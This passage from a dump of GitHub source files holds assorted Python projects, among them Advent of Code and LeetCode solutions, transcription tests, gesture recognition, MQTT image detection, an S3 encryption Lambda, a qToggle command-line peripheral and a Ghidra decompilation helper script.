sys.stdin:\n M.append(VM.parse_instruction(line.strip()))\n\nvm = VM(M)\nstates = set()\nwhile True:\n if vm.pc in states:\n print(\"EXIT\", vm.acc)\n sys.exit(0)\n states.add(vm.pc)\n vm.execute()\n","repo_name":"apetresc/contests","sub_path":"adventofcode/2020/8/8a.py","file_name":"8a.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"43246142552","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport pymongo\nfrom tutorial import settings\n\n\nclass TutorialPipeline(object):\n\n def __init__(self):\n self.client = pymongo.MongoClient(host=settings.MONGO_HOST, port=settings.MONGO_PORT)\n self.db = self.client[settings.MONGO_DB]\n self.coll = self.db[settings.MONGO_COLL]\n\n def process_item(self, item, spider):\n post_item = dict(item)\n re = self.coll.find_one(post_item)\n if re is None:\n self.coll.insert(post_item)\n return \"[%s] info save success!\" % post_item['name']\n else:\n return \"[%s] 已经存在!\" % post_item['name']\n\n","repo_name":"shell-collection/58guakao-crawler","sub_path":"tutorial/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74715034858","text":"#!/opt/homebrew/bin/python3\n\nimport itertools\n\n\ndef combinations(l1, l2):\n for i in range(len(l1)):\n for j in range(len(l2)):\n yield (l1[i], l2[j])\n\n\ndeck1 = [['A', [1, 2, 5, 6, 7, 9, 10, 11, 14, 15, 16, 18]],\n ['B', [1, 3, 4, 5, 8, 9, 10, 12, 13, 14, 17, 18]],\n ['C', [2, 3, 4, 6, 7, 8, 11, 12, 13, 15, 16, 17]]]\n\ndeck2 = [['D', [1, 4, 9, 12, 14, 17, 19, 22, 27, 30, 32, 35]],\n ['E', [2, 5, 7, 10, 15, 18, 20, 23, 25, 28, 33, 36]],\n ['F', [3, 6, 8, 11, 13, 16, 21, 24, 26, 29, 31, 34]]]\n\nfor deck in [deck1, deck2]:\n stats = {}\n for first, second in itertools.combinations(deck, 2):\n first_name = first[0]\n second_name = second[0]\n combo = first_name + second_name\n\n # init stats for this particular combo\n stats[combo] = {}\n stats[combo]['win'] = 0\n stats[combo]['lose'] = 0\n stats[combo]['tie'] = 0\n stats[combo]['total'] = 0\n\n for a, b in combinations(first[1], second[1]):\n if a > b:\n stats[combo]['win'] += 1\n elif a == b:\n stats[combo]['tie'] += 1\n else:\n stats[combo]['lose'] += 1\n stats[combo]['total'] += 1\n \n\n print(stats)\n","repo_name":"kaveman909/games","sub_path":"intransitive.py","file_name":"intransitive.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"30091528672","text":"from loguru import logger\nfrom smatter import transx\nfrom faster_whisper.transcribe import Segment\nfrom libs.vad.utils_vad import VADIterator\nfrom pytest_mock import MockerFixture\nimport io\nimport numpy as np\nimport pytest\nimport string\nimport multiprocessing as mp\n\n\ndef generate_txdata(text) -> transx.TransXData:\n return {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.1,\n \"noise_probability\": 0.2,\n \"compression_ratio\": 0.3,\n \"text\": text.strip()\n }\n\n@pytest.mark.parametrize(\n \"base_start, start, end, text, prob, noise, comp\",\n [\n (5.0, 0.423, 0.555, \"Hello everyone!\", -0.522878745280338, 0.1, 1.2),\n (10.4, 0.0, 1.0, \"Were you listening to me?\", -0.154901959985743, 
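# ---- editor's note: illustrative sketch, not part of the original records ----
# The Advent-of-Code VM in 8a.py above halts by remembering every program
# counter it has visited: the first revisited pc means the program loops
# forever. The same idea as a standalone helper (hypothetical, mirrors the
# __main__ loop of that record):
def runs_forever(vm):
    seen = set()
    while vm.pc < len(vm.mem):
        if vm.pc in seen:
            return True        # pc revisited -> infinite loop detected
        seen.add(vm.pc)
        vm.execute()
    return False               # pc ran off the end -> normal termination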
0.1, 1.5),\n    (123.12, 4.99, 5.94, \"That's the plan for today.\", -0.638272163982407, 0.1, 0.8),\n    (1423.1, 12.9, 13, \"That doesn't really make sense...\", -3.88605664769316, 0.7, 3.2),\n  ]\n)\ndef test_segment_to_txdata(base_start, start, end, text, prob, noise, comp):\n  s = Segment(\n    1,\n    16430,\n    start,\n    end,\n    text,\n    [15496, 11075, 0],\n    0.0,\n    prob,\n    comp,\n    noise,\n    None,\n  )\n  result = transx.segment_to_txdata(s, base_start)\n  assert result == {\n    \"start\": base_start + start,\n    \"end\": base_start + end,\n    \"probability\": np.exp(prob),\n    \"noise_probability\": noise,\n    \"compression_ratio\": comp,\n    \"text\": text.strip()\n  }\n\n@pytest.mark.parametrize(\n  \"input, output, fixed\",\n  [\n    (\"That's crazy, that's crazy, that's crazy, that's crazy, that's crazy, that's crazy!\",\n     \"That's crazy, that's crazy, that's crazy[...]\",\n     True),\n    (\"Honestly I don't know what to say, I don't know what to say, I don't know what to say, I don't know what to say, I don't know what to say.\",\n     \"Honestly I don't know what to say, I don't know what to say, I don't know what to say[...]\",\n     True),\n    (\"There might be something in here? Oh no! oh no! oh no! oh no! oh no! oh no! Run!\",\n     \"There might be something in here? Oh no! oh no! oh no! oh no! oh no! oh no! Run!\",\n     False),\n    (\"There might be something in here? Oh no! oh no! oh no! oh no! oh no! oh no!\",\n     \"There might be something in here? Oh no! oh no! oh no![...]\",\n     True),\n    (\"If there's a point to this, perhaps it could be... I don't know if there's a point to this? Do you think there's a point to this? I don't think there's a point to this.\",\n     \"If there's a point to this, perhaps it could be... I don't know if there's a point to this? Do you think there's a point to this? I don't think there's a point to this.\",\n     False), \n  ],\n)\ndef test_fix_repeated_phrases(input, output, fixed):\n  result = transx.fix_repeated_phrases(input)\n  assert result == (output, fixed)\n\n@pytest.mark.parametrize(\n  \"input, output, fixed\",\n  [\n    (\"Hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha\",\n     \"Hahahahahahaha[...]\",\n     True),\n    (\"Nonononononononono\",\n     \"Nonononononono[...]\",\n     True),\n    (\"That looks amazing! Wowowowowowowowowowowowowowowowowow\",\n     \"That looks amazing! Wowowowowowow[...]\",\n     True), \n    (\"HAHAHAHAHAHAHA\",\n     \"HAHAHAHAHAHA[...]\",\n     True),\n    (\"HAHAHAHAHAHA\",\n     \"HAHAHAHAHAHA\",\n     True),\n    (\"HAHAHAHAHA\",\n     \"HAHAHAHAHA\",\n     False),\n    (\"HA HA HA HA HA HA HA\",\n     \"HA HA HA HA HA HA HA\",\n     False)\n  ],\n)\ndef test_fix_repeated_sounds(input, output, fixed):\n  result = transx.fix_repeated_sounds(input)\n  assert result == (output, fixed)\n\n@pytest.mark.parametrize(\n  \"input, size, first\",\n  [\n    ([\n      \"Bye! 
Bye!\",\n \"Hello!\",\n \"Thanks for watching my last video\"\n ],\n 2,\n \"Hello!\"),\n ([\n \"Goodbye!\",\n \"please subscribe to my channel\",\n \"SEE YOU IN THE NEXT VIDEO?\"\n ],\n 1,\n \"Goodbye!\"), \n ],\n)\ndef test_filter_gigo_results(input, size, first):\n tx_data = list(map(lambda x: generate_txdata(x), input))\n test_gigo_phrases = list(map(lambda x: x.translate(str.maketrans('', '', string.punctuation)).casefold(), [\n 'Bye Bye',\n 'Please subscribe to my channel',\n 'Thanks for watching',\n 'See you in the next video'\n ]))\n result = transx.filter_gigo_results(tx_data, test_gigo_phrases)\n assert len(result) == size\n assert result[0][\"text\"] == first\n\n@pytest.mark.parametrize(\n \"input, output, vtt\",\n [\n (1.0, \"00:00:01,000\", False),\n (61.0, \"00:01:01,000\", False),\n (2.123456789, \"00:00:02,123\", False),\n (86399.999, \"23:59:59,999\", False),\n (1.3, \"00:00:01.300\", True),\n (543.5678, \"00:09:03.567\", True) \n ],\n)\ndef test_seconds_to_timestamp(input, output, vtt):\n result = transx.seconds_to_timestamp(input, vtt)\n assert result == output\n\ndef test_transx_to_string(monkeypatch):\n monkeypatch.setattr(transx, \"fix_repeated_phrases\", lambda x: (x, True))\n monkeypatch.setattr(transx, \"fix_repeated_sounds\", lambda x: (x, True))\n tx: transx.TransXData = {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.9,\n \"noise_probability\": 0.1,\n \"compression_ratio\": 1.0,\n \"text\": 'Sample text'\n }\n result = transx.transx_to_string(tx)\n assert result == '[---]: Sample text'\n\n tx1: transx.TransXData = {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.4,\n \"noise_probability\": 0.6,\n \"compression_ratio\": 2.1,\n \"text\": 'Sample text'\n }\n result1 = transx.transx_to_string(tx1)\n assert result1 == '[???]: Sample text'\n\n tx2: transx.TransXData = {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.2,\n \"noise_probability\": 0.9,\n \"compression_ratio\": 3.2,\n \"text\": 'Sample text'\n }\n result2 = transx.transx_to_string(tx2)\n assert result2 == '[!!!]: Sample text'\n \ndef test_txdata_to_srt(monkeypatch):\n monkeypatch.setattr(transx, \"seconds_to_timestamp\", lambda x, y: \"00:00:01,000\" if not y else \"00:00:01.000\")\n monkeypatch.setattr(transx, \"transx_to_string\", lambda x: '[---]: Sample text')\n tx: transx.TransXData = {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.9,\n \"noise_probability\": 0.1,\n \"compression_ratio\": 1.0,\n \"text\": 'Sample text'\n }\n result = transx.txdata_to_srt(tx, 1, False)\n assert result == '1\\n00:00:01,000 --> 00:00:01,000\\n[---]: Sample text\\n\\n'\n result1 = transx.txdata_to_srt(tx, 1, True)\n assert result1 == '1\\n00:00:01.000 --> 00:00:01.000\\n[---]: Sample text\\n\\n'\n\ndef test_join_similar():\n tx1: transx.TransXData = {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.1,\n \"noise_probability\": 0.2,\n \"compression_ratio\": 0.3,\n \"text\": 'Sample text'\n }\n tx2: transx.TransXData = {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.1,\n \"noise_probability\": 0.2,\n \"compression_ratio\": 0.3,\n \"text\": 'Sample text'\n }\n tx3: transx.TransXData = {\n \"start\": 3.0,\n \"end\": 4.0,\n \"probability\": 0.9,\n \"noise_probability\": 0.3,\n \"compression_ratio\": 1.0,\n \"text\": 'More sample text'\n }\n tx4: transx.TransXData = {\n \"start\": 5.0,\n \"end\": 6.0,\n \"probability\": 0.5,\n \"noise_probability\": 0.1,\n \"compression_ratio\": 2.0,\n \"text\": 'More sample text'\n }\n result = transx.join_similar([tx1, tx2, tx3, tx4])\n assert 
len(result) == 2\n  assert result[0][\"text\"] == 'Sample text'\n  assert result[0][\"start\"] == 1.0\n  assert result[0][\"end\"] == 2.0\n  assert result[0][\"probability\"] == 0.1\n  assert result[0][\"noise_probability\"] == 0.2\n  assert result[0][\"compression_ratio\"] == 0.3\n  assert result[1][\"text\"] == 'More sample text'\n  assert result[1][\"start\"] == 3.0\n  assert result[1][\"end\"] == 6.0\n  assert result[1][\"probability\"] == 0.9\n  assert result[1][\"noise_probability\"] == 0.3\n  assert result[1][\"compression_ratio\"] == 2.0\n\nclass MockProcess:\n  _inbytes = b'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f'\n  stdout = io.BytesIO(_inbytes)\n\n#Testing transx.chunk_from_samples()\ndef test_chunk_from_samples():\n  mock_process = MockProcess()\n  chunk_gen = transx.chunk_from_samples(mp.Event(), logger, mock_process, 2) #type: ignore\n  result = np.zeros(0, np.float32)\n  for c in chunk_gen:\n    assert isinstance(c, np.ndarray)\n    assert c.dtype == np.float32\n    assert c.shape == (2,)\n    result = np.concatenate([result, c])\n  assert np.array_equal(result, np.array([0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0]))\n\ndef test_vad_samples(mocker: MockerFixture):\n  count = 0\n  def pretend_vad(self, x, return_seconds=False):\n    nonlocal count\n    assert x.shape == (2,)\n    assert x.dtype == np.float32\n    assert x.all() == np.array([-12.3, 4.9], np.float32).all()\n    count += 1\n    if count == 2:\n      return {'start': 3}\n    elif count == 3:\n      return {'end': 6}\n    else:\n      return None\n\n  mocker.patch('libs.vad.utils_vad.VADIterator.reset_states')\n  mocker.patch('libs.vad.utils_vad.VADIterator.__call__', pretend_vad)\n  chunk_size = 2\n  max_size = 10\n  start = 0\n  blanks = mp.Queue()\n  def chunk_gen():\n    for x in range(1, 10):\n      yield np.array([-12.3, 4.9], np.float32)\n\n  vad = transx.vad_samples(logger, chunk_gen(), chunk_size, max_size, start, blanks)\n  first_start, first = vad.__next__()\n  assert first_start == 3\n  assert first.all() == np.array([-12.3, 4.9, -12.3, 4.9, -12.3, 4.9], np.float32).all()\n\n  with pytest.raises(StopIteration):\n    vad.__next__()\n\ndef test_vad_samples_maxed(mocker: MockerFixture):\n  count = 0\n  def pretend_vad(self, x, return_seconds=False):\n    nonlocal count\n    assert x.shape == (2,)\n    assert x.dtype == np.float32\n    assert x.all() == np.array([-12.3, 4.9], np.float32).all()\n    count += 1\n    if count == 1:\n      return {'start': 1}\n    else:\n      return None\n\n  mocker.patch('libs.vad.utils_vad.VADIterator.reset_states')\n  mocker.patch('libs.vad.utils_vad.VADIterator.__call__', pretend_vad)\n  chunk_size = 2\n  max_size = 10\n  start = 0\n  blanks = mp.Queue()\n  def chunk_gen():\n    for x in range(1, 10):\n      yield 
np.zeros(1024, np.float32)\n \n vad = transx.vad_samples(logger, chunk_gen(), chunk_size, 320000, start, blanks)\n\n with pytest.raises(StopIteration):\n vad.__next__()\n \n assert blanks.qsize() == 4\n assert blanks.get() == (0.0, 1.024, None)\n assert blanks.get() == (1.088, 2.112, None)\n assert blanks.get() == (2.176, 3.2, None)\n assert blanks.get() == (3.264, 4.288, None)","repo_name":"karsaroth/smatter","sub_path":"tests/test_transx.py","file_name":"test_transx.py","file_ext":"py","file_size_in_byte":11128,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"21073231138","text":"#\n# MQTT Image processing class\n# Used for analysing and annotating an image with detection boxes.\n# Author: Joakim Eriksson, joakim.eriksson@ri.se\n#\n\nimport paho.mqtt.client as mqtt\nimport cv2, sys, numpy as np\nimport images_pb2\n\n# Hack to allow import of the yolov3 detector\n# should be in a package later...\nsys.path.append('../yolov3-ha')\nimport yolo3\n\ndef create_image_pb(frame, id):\n img = images_pb2.Image()\n h, w = frame.shape[:2]\n img.width = w\n img.height = h\n img.id = id\n img.imgdata = cv2.imencode('.png', frame)[1].tostring()\n return img\n\ndef create_detections_pb(detections, image_pb):\n if detections == []:\n return None\n det_pb = images_pb2.ImageObjectDetections()\n det_pb.image.CopyFrom(image_pb)\n det_pb.algorithm_name = \"Yolo V3 / COCO\"\n for detection in detections:\n tmpdet = det_pb.detections.add()\n tmpdet.class_name = detection[0]\n tmpdet.score = detection[1]\n tmpdet.left = detection[2][0]\n tmpdet.top = detection[2][1]\n tmpdet.right = detection[2][2]\n tmpdet.bottom = detection[2][3]\n return det_pb;\n\nclass MQTTImageProcess(mqtt.Client):\n\n def __init__(self, id):\n super().__init__(id)\n self.frame = None\n self.show_frame = False\n\n def on_connect(self, mqttc, obj, flags, rc):\n if rc == 0:\n print(\"Connected to broker:\", rc)\n else:\n print(\"Connection failed: \", rc)\n\n def on_message(self, mqttc, obj, message):\n print(message.topic + \" \" + str(message.qos))\n if message.topic == \"ha/camera/mqtt\":\n print(\"Matched!!!\")\n nparr = np.frombuffer(message.payload, np.uint8)\n self.frame = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n self.show_frame = True\n elif message.topic == \"ha/camera/mqtt_pb\":\n frame_pb = images_pb2.Image()\n frame_pb.ParseFromString(message.payload)\n print(\"PB img: width:\",frame_pb.width, \"height:\", frame_pb.height)\n nparr = np.frombuffer(frame_pb.imgdata, np.uint8)\n self.frame = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n self.show_frame = True\n\n def on_publish(self, mqttc, obj, mid):\n print(\"mid: \"+str(mid))\n\n def on_subscribe(self, mqttc, obj, mid, granted_qos):\n print(\"Subscribed: \" + str(mid) + \" \" + str(granted_qos) + \" \" + str(obj))\n\n def on_log(self, mqttc, obj, level, string):\n print(string)\n\n\n\n# If you want to use a specific client id, use\n# mqttc = MyMQTTClass(\"client-id\")\n# but note that the client id must be unique on the broker. 
Leaving the client\n# id parameter empty will generate a random id for you.\nclient = MQTTImageProcess(\"test-id\")\nclient.connect(\"localhost\")\n# Should take this a configs...\nclient.subscribe(\"ha/camera/mqtt\", 0)\nclient.subscribe(\"ha/camera/mqtt_pb\", 0)\nclient.loop_start()\n\nyolo = yolo3.YoloV3(0.5, 0.4, datapath=\"../yolov3-ha\")\n\nwhile(True):\n # Capture frame-by-frame\n if client.show_frame:\n# cv2.imshow('Cam-frame', frame)\n nf = client.frame.copy()\n d = yolo.detect(nf)\n if d != []:\n # Create a detections protocol buffer \n img = create_image_pb(nf, \"the-id\")\n det_pb = create_detections_pb(d, img)\n cv2.imshow('Det-frame', nf)\n client.show_frame = False\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncv2.destroyAllWindows()","repo_name":"joakimeriksson/ai-smarthome","sub_path":"mqtt-camera/mqtt-img.py","file_name":"mqtt-img.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"92"} +{"seq_id":"5256475062","text":"#==================================================================================================\n# Function: \n# Purpose: A Python function to list the AWS S3 buckets in the account that do not have\n# encryption status and apply the default encryption\n#==================================================================================================\n\nimport boto3, json, datetime, os, sys\nfrom time import gmtime, strftime\nfrom datetime import date\n\n#==================================================================================================\n# Function handler\n#==================================================================================================\ndef lambda_handler(event, context):\n \n buckets = {}\n buckets['Encryption_Applied'] = []\n #buckets['Already_Encrypted'] = []\n \n date_fmt = strftime(\"%d_%m_%Y_%H:%M:%S\", gmtime()) #get to the current date\n account_id = context.invoked_function_arn.split(\":\")[4]\n sns_topic_arn = os.environ['TOPIC_ARN']\n sns_topic_region = os.environ['TOPIC_REGION']\n s3_bucket_exception_list = os.environ['S3_EXCEPTION']\n \n\n s3client = boto3.client('s3')\n\n print(boto3.__version__)\n \n try:\n # describe buckets\n list_bucket_response = s3client.list_buckets()\n for bucket_dictionary in list_bucket_response['Buckets']:\n if bucket_dictionary['Name'] not in s3_bucket_exception_list:\n try:\n bucket_encryption_response = s3client.get_bucket_encryption(Bucket=bucket_dictionary['Name'])\n for rules in bucket_encryption_response['ServerSideEncryptionConfiguration']['Rules']:\n for key, value in rules['ApplyServerSideEncryptionByDefault'].items():\n if (str(value) in ('AES256','aws:kms')):\n print (\"\\n{0} is already encrypted\".format(bucket_dictionary['Name']))\n #buckets['Already_Encrypted'].append(bucket_dictionary['Name'])\n except:\n print (\"\\n{0} unencrypted\".format(bucket_dictionary['Name']))\n response = s3client.put_bucket_encryption(\n Bucket=bucket_dictionary['Name'],\n ServerSideEncryptionConfiguration={\n 'Rules': [{\n 'ApplyServerSideEncryptionByDefault': {'SSEAlgorithm': 'AES256'}\n }, ]\n })\n print (\"Default Encryption applied\")\n buckets['Encryption_Applied'].append(bucket_dictionary['Name'])\n\n if (buckets['Encryption_Applied'] == []):\n print (\"Nothing to SNS\")\n else:\n # SNS topic Section\n sns_client = boto3.client('sns',region_name=sns_topic_region)\n subject = 'AWS Account - ' + account_id + ' S3 Bucket Encryption Status ' + 
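# ---- editor's note: illustrative sketch, not part of the original records ----
# The MQTT camera record above ships frames as PNG bytes and rebuilds them with
# np.frombuffer + cv2.imdecode. The roundtrip in isolation (note: .tostring()
# in the record is a deprecated alias of .tobytes()):
import cv2
import numpy as np

frame = np.zeros((4, 4, 3), np.uint8)               # stand-in for a camera frame
payload = cv2.imencode('.png', frame)[1].tobytes()  # encode -> bytes for publish()
decoded = cv2.imdecode(np.frombuffer(payload, np.uint8), cv2.IMREAD_COLOR)
assert (decoded == frame).all()                     # PNG is lossless, so exact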
date_fmt\n message_body = '\\n' + \"Encryption applied to S3 buckets are \" + str(buckets)\n sns_client.publish(TopicArn=sns_topic_arn, Message=message_body, Subject=subject)\n \n return buckets\n\n except:\n err = 'Error'\n for e in sys.exc_info():\n err += str(e)\n print(\"error {0}\".format(err))\n","repo_name":"ministryofjustice/cloud-platform-terraform-awsaccounts-baselines","sub_path":"modules/lambdas/functions/s3-bucket-enable-default-encryption/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"3454855554","text":"class Solution:\r\n def minWindow(self, s: str, t: str) -> str:\r\n if s == None or t == None or len(s) == 0 or len(t) == 0 or len(s)= 0.99:\n # print(str(value)+\" \"+str(result))\n\n #cv2.putText(clone, 'Gesture Recognize as : '+str(classname), (10, 25), cv2.FONT_HERSHEY_SIMPLEX,0.5, (0, 255, 255), 2)\n #if oldresult != result:\n #play(playcount,result)\n #oldresult = result\n #playcount = playcount + 1\n \n \n cv2.rectangle(clone, (left, top), (right, bottom), (0,255,0), 2)\n num_frames += 1\n cv2.imshow(\"Video Feed\", clone)\n keypress = cv2.waitKey(1) & 0xFF\n if keypress == ord(\"q\"):\n break\n camera.release()\n cv2.destroyAllWindows() \n \nfont = ('times', 16, 'bold')\ntitle = Label(main, text='Robust Hand Gesture Recognition using Multiple-Shape Oriented Visual Cues',anchor=W, justify=CENTER)\ntitle.config(bg='yellow4', fg='white') \ntitle.config(font=font) \ntitle.config(height=3, width=120) \ntitle.place(x=0,y=5)\n\n\nfont1 = ('times', 13, 'bold')\nupload = Button(main, text=\"Upload Hand Gesture Dataset\", command=uploadDataset)\nupload.place(x=50,y=100)\nupload.config(font=font1) \n\npathlabel = Label(main)\npathlabel.config(bg='yellow4', fg='white') \npathlabel.config(font=font1) \npathlabel.place(x=50,y=150)\n\nmarkovButton = Button(main, text=\"Train SVM with Gesture Images\", command=trainSVM)\nmarkovButton.place(x=50,y=200)\nmarkovButton.config(font=font1)\n\npredictButton = Button(main, text=\"Hand Gesture Recognition from Webcam\", command=webcamPredict)\npredictButton.place(x=50,y=250)\npredictButton.config(font=font1)\n\n\nfont1 = ('times', 12, 'bold')\ntext=Text(main,height=15,width=78)\nscroll=Scrollbar(text)\ntext.configure(yscrollcommand=scroll.set)\ntext.place(x=450,y=100)\ntext.config(font=font1)\n\ndeleteDirectory()\nmain.config(bg='yellow')\nmain.mainloop()\n","repo_name":"coderkrishna/Hand-gesture-recognition","sub_path":"HandGestureRecognize.py","file_name":"HandGestureRecognize.py","file_ext":"py","file_size_in_byte":13792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12343616314","text":"import asyncio\nimport logging\nimport re\n\nfrom typing import Any, Optional\n\nfrom qtoggleserver.core import ports as core_ports\nfrom qtoggleserver.core.typing import NullablePortValue, PortValue\nfrom qtoggleserver.lib import polled\n\nfrom .exceptions import CommandTimeout\nfrom .. 
import cmdline\n\n\nclass CommandLine(polled.PolledPeripheral):\n DEFAULT_POLL_INTERVAL = 10\n RETRY_POLL_INTERVAL = 5\n DEFAULT_TIMEOUT = 5\n\n logger = logging.getLogger(cmdline.__name__)\n\n def __init__(\n self,\n *,\n output_regexp: Optional[str] = None,\n read_command: Optional[str] = None,\n write_command: Optional[str] = None,\n ports: list[dict[str, Any]] = None,\n port: dict[str, Any] = None,\n timeout: int = DEFAULT_TIMEOUT,\n **kwargs\n ) -> None:\n\n super().__init__(**kwargs)\n\n self._output_regexp: Optional[re.Pattern] = None\n self._read_command: Optional[str] = read_command\n self._write_command: Optional[str] = write_command\n self._port_details: list[dict[str, Any]] = ports\n self._timeout: int = timeout\n\n if port and not ports:\n self._port_details = [port]\n\n if output_regexp:\n self._output_regexp = re.compile(output_regexp, re.MULTILINE | re.DOTALL)\n\n self._values: dict[str, Optional[float]] = {p['id']: None for p in self._port_details}\n\n async def run_command(self, cmd: str, env: Optional[dict[str, str]]) -> tuple[str, int]:\n self.debug('executing command \"%s\"', cmd)\n\n p = await asyncio.create_subprocess_shell(\n cmd,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n env=env\n )\n\n try:\n stdout, stderr = await asyncio.wait_for(p.communicate(), timeout=self._timeout)\n except asyncio.TimeoutError:\n raise CommandTimeout()\n\n if stderr:\n stderr = stderr.decode().strip()\n stderr = stderr.replace('\\n', '\\\\n')\n self.warning('command returned stderr: %s', stderr)\n\n stdout = stdout.decode().strip()\n\n return stdout, p.returncode\n\n async def poll(self) -> None:\n if not self._read_command:\n return\n\n output, exit_code = await self.run_command(self._read_command, env=None)\n\n if self._output_regexp:\n m = self._output_regexp.match(output)\n if not m:\n # If output doesn't match our regexp, use None for all values\n for k in self._values:\n self._values[k] = None\n\n return\n\n groups = list(m.groups())\n if not groups:\n groups = [output] * len(self._port_details)\n\n while len(groups) < len(self._port_details):\n groups.append('')\n\n for i, p in enumerate(self._port_details):\n g = groups[i].strip().lower()\n try:\n value = int(g)\n except ValueError:\n try:\n value = float(g)\n except ValueError:\n value = None\n\n if (p['type'] == core_ports.TYPE_BOOLEAN) and (value is None):\n value = int(g == 'true') # for boolean ports, text \"true\" is also accepted\n\n self._values[p['id']] = value\n else:\n # When no regexp is given, use exit code\n for i, k in enumerate(self._values):\n if self._port_details[i]['type'] == core_ports.TYPE_BOOLEAN:\n self._values[k] = int(not exit_code) # process exit code 0 means true\n else:\n self._values[k] = exit_code\n\n def get_value(self, port_id: str) -> NullablePortValue:\n return self._values.get(port_id)\n\n def update_value(self, port_id: str, value: PortValue) -> None:\n if isinstance(value, bool):\n value = int(value) # keep only int/float values\n\n self._values[port_id] = value\n\n async def write_values(self) -> None:\n env = {}\n for port_id, value in self._values.items():\n if value is None:\n value = ''\n else:\n value = str(value)\n\n port_id = re.sub('[^a-zA-Z0-9_-]', '_', port_id)\n env[port_id] = value\n\n _, exit_code = await self.run_command(self._write_command, env=env)\n\n if exit_code:\n self.warning('command returned non-zero exit code %d', exit_code)\n\n # Poll values immediately after writing\n await self.poll()\n\n async def make_port_args(self) -> list[dict[str, 
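# ---- editor's note: illustrative sketch, not part of the original record ----
# run_command() above is the core pattern of this peripheral: spawn a shell
# command and bound it with asyncio.wait_for. Reduced to a self-contained
# snippet (killing the child on timeout is an addition, not in the record):
import asyncio

async def run_with_timeout(cmd: str, timeout: float = 5.0) -> tuple[str, int]:
    p = await asyncio.create_subprocess_shell(
        cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)
    try:
        stdout, _ = await asyncio.wait_for(p.communicate(), timeout=timeout)
    except asyncio.TimeoutError:
        p.kill()                     # reap the child instead of leaking it
        raise
    return stdout.decode().strip(), p.returncode

# asyncio.run(run_with_timeout('echo hello'))  # -> ('hello', 0)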
Any]]:\n from .ports import CommandLinePort\n\n return [{\n 'driver': CommandLinePort,\n 'id': p['id'],\n 'type': p['type'],\n 'writable': self._write_command is not None\n } for p in self._port_details]\n","repo_name":"qtoggle/qtoggleserver-cmdline","sub_path":"qtoggleserver/cmdline/peripheral.py","file_name":"peripheral.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38504035708","text":"#TODO write a description for this script\n#@author \n#@category Python 3\n#@keybinding Ctrl-Shift-K\n#@menupath \n#@toolbar \n\n\n#TODO Add User Code Here\nfrom ghidra.util.task import TaskMonitor\nfrom ghidra.app.decompiler import DecompInterface\nfrom ghidra.app.decompiler import DecompileOptions\nfrom ghidra.program.model.symbol import SourceType\nfrom ghidra.util.task import ConsoleTaskMonitor\nimport json\nfrom java.security import MessageDigest\nfrom ghidra.program.model.listing import Program\nimport requests\n\n\ndef send_code_to_server(sha256, function_offset, code, suggestion):\n \"\"\"\n Send the decompiled code to a server for analysis.\n \n Args:\n sha256 (str): The SHA-256 hash value of the program.\n function_offset (str): The offset value of the function.\n code (str): The decompiled code of the function.\n \n Returns:\n dict: A dictionary containing the server's response.\n \"\"\"\n #url = \"http://localhost:8000/suggest\" # Adjust the URL if needed\n url = \"http://lupine.richards.ai:9001/suggest\" # Adjust the URL if needed\n\n\n\n print(sha256, function_offset, code, suggestion)\n data = {\n \"sha256\": sha256,\n \"offset\": function_offset,\n \"code\": code,\n \"suggestion\": suggestion\n }\n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n response = requests.post(url, data=json.dumps(data), headers=headers)\n print(response)\n \n if response.status_code != 200:\n raise Exception(f\"Server returned status code {response.status_code}: {response.text}\")\n \n return response.json()\n\n\n\noptions = DecompileOptions()\nmonitor = ConsoleTaskMonitor()\nifc = DecompInterface()\nifc.setOptions(options)\n\nstate = getState()\nlocation_str = state.getCurrentLocation().getAddress().toString()\nlocation = state.getCurrentLocation().getAddress()\n\nprint(\"Starting script\")\ntask_monitor = TaskMonitor.DUMMY\nprint(\"Task monitor created\")\ndecompiler = DecompInterface()\nprint(\"Decompiler created\")\ndecompiler.openProgram(currentProgram())\nprint(\"Program opened at: {location}\".format(location=location))\n\n\nhash_value = currentProgram().getExecutableSHA256()\nfm = currentProgram().getFunctionManager()\n#first we try to get the function at the current location\n\nfunction = fm.getFunctionAt(location)\nprint(\"Function found at location: 